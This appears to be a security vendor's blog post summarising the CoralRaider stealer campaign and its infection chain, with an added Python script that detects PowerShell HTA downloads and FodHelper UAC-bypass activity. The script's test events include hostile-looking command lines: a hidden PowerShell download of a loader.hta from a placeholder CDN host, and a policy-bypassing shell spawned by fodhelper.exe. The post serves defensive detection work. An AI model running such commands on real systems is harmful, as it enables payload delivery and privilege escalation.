Since at least February 2024, a new and ongoing CoralRaider malware campaign has been distributing three distinct stealers—CryptBot, LummaC2, and Rhadamanthys. The malicious files were found hosted on Content Delivery Network (CDN) cache sites.
With a reasonable degree of confidence, Cisco Talos has attributed this activity to a threat actor known as CoralRaider. This group, suspected to be of Vietnamese origin, came to light earlier this month.
According to the company, this assessment is based on “several overlaps in tactics, techniques, and procedures (TTPs) of CoralRaider’s Rotbot campaign, including the initial attack vector of the Windows Shortcut file, intermediate PowerShell decryptor and payload download scripts, and the FoDHelper technique used to bypass User Access Controls (UAC) of the victim machine.”
The campaign’s targets encompass a wide range of countries and business verticals, including the United States, Nigeria, Pakistan, Ecuador, Germany, Egypt, the United Kingdom, Poland, the Philippines, Norway, Japan, Syria, Turkey, and various other geographical areas.
The attack chain lures users into downloading files disguised as movie files through a web browser, which raises the risk of a broad, opportunistic attack.
According to Talos researchers Joey Chen, Chetan Raghuprasad, and Alex Karkins, “this threat actor is using a Content Delivery Network (CDN) cache to store the malicious files on their network edge host in this campaign, avoiding request delay.” They added: “The actor is using the CDN cache as a download server to deceive network defenders.”
Phishing emails are believed to have served as the initial access point for the drive-by downloads. These emails disseminated booby-trapped URLs leading to ZIP archives containing Windows shortcut files (LNK files).
Once the shortcut file executes, a PowerShell script retrieves an HTML application (HTA) payload stored on the CDN cache. Subsequently, the embedded PowerShell loader executes JavaScript code, initiating a covert operation that culminates in the download and execution of one of the three stealer malware programs.
The modular PowerShell loader script is designed to bypass User Account Control (UAC) on the victim’s computer using a technique known as FodHelper. Vietnamese threat actors have also used this method to deploy another stealer, NodeStealer, which is capable of stealing data from Facebook accounts.
Whichever stealer is deployed, it exfiltrates victims’ data, including banking information, credentials, system and browser data, and cryptocurrency wallets.
The campaign is also notable for using an updated version of CryptBot that adds further anti-analysis techniques and harvests data from authenticator apps and password-manager databases.
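To make the chain above concrete from a defender's side, here is an added Python example (written for this page, not Talos's or the article's code) that runs two detection rules over constructed Sysmon-style process-creation events: PowerShell launched from a shortcut that fetches an .hta file, and a shell spawned by fodhelper.exe, which is the hallmark of the FodHelper UAC bypass. Field names, hostnames and command lines are constructed assumptions.

```python
import re

# URL whose path ends in .hta, as in the CDN-hosted HTA payload stage described above.
HTA_URL = re.compile(r"https?://\S+?\.hta\b", re.IGNORECASE)
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe")
# A double-clicked .lnk is normally started by explorer.exe, or by cmd.exe if the
# shortcut targets cmd first (assumption: these are the only parents we model).
LNK_PARENTS = ("explorer.exe", "cmd.exe")

def _base(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rule_lnk_hta_download(ev: dict) -> bool:
    """PowerShell started from a shortcut that downloads an .hta file."""
    return (_base(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and _base(ev["parent_image"]) in LNK_PARENTS
            and HTA_URL.search(ev["cmdline"]) is not None)

def rule_fodhelper_child(ev: dict) -> bool:
    """fodhelper.exe is a Windows settings helper; it has no reason to spawn a shell."""
    return _base(ev["parent_image"]) == "fodhelper.exe" and _base(ev["image"]) in SHELLS

RULES = {
    "lnk_powershell_hta_download": rule_lnk_hta_download,
    "fodhelper_uac_bypass_child": rule_fodhelper_child,
}

def scan(events):
    """Return (event_index, rule_name) pairs for every event that trips a rule."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]

# Constructed sample events (Sysmon Event ID 1 trimmed to three fields); the CDN host is a placeholder.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "parent_image": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://cdn-cache.example.invalid/movie/loader.hta -o $env:TEMP\\m.hta"'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": "cmd /c powershell -ep bypass"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "powershell Get-Process"},
]

if __name__ == "__main__":
    for idx, rule_name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name}")
```

On real telemetry, feed the same three fields from your EDR or Sysmon pipeline; the benign fourth event shows that PowerShell under cmd.exe alone does not trip either rule.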
About Rhyno Cybersecurity Services
Rhyno Cybersecurity is a Canadian-based company focusing on 24/7 Managed Detection and Response, Penetration Testing, Enterprise Cloud, and Cybersecurity Solutions for small and midsize businesses.
Our products and services are robust, innovative, and cost-effective. Underpinned by our 24x7x365 Security Operations Centre (SOC), our experts ensure you have access to cybersecurity expertise when you need it the most.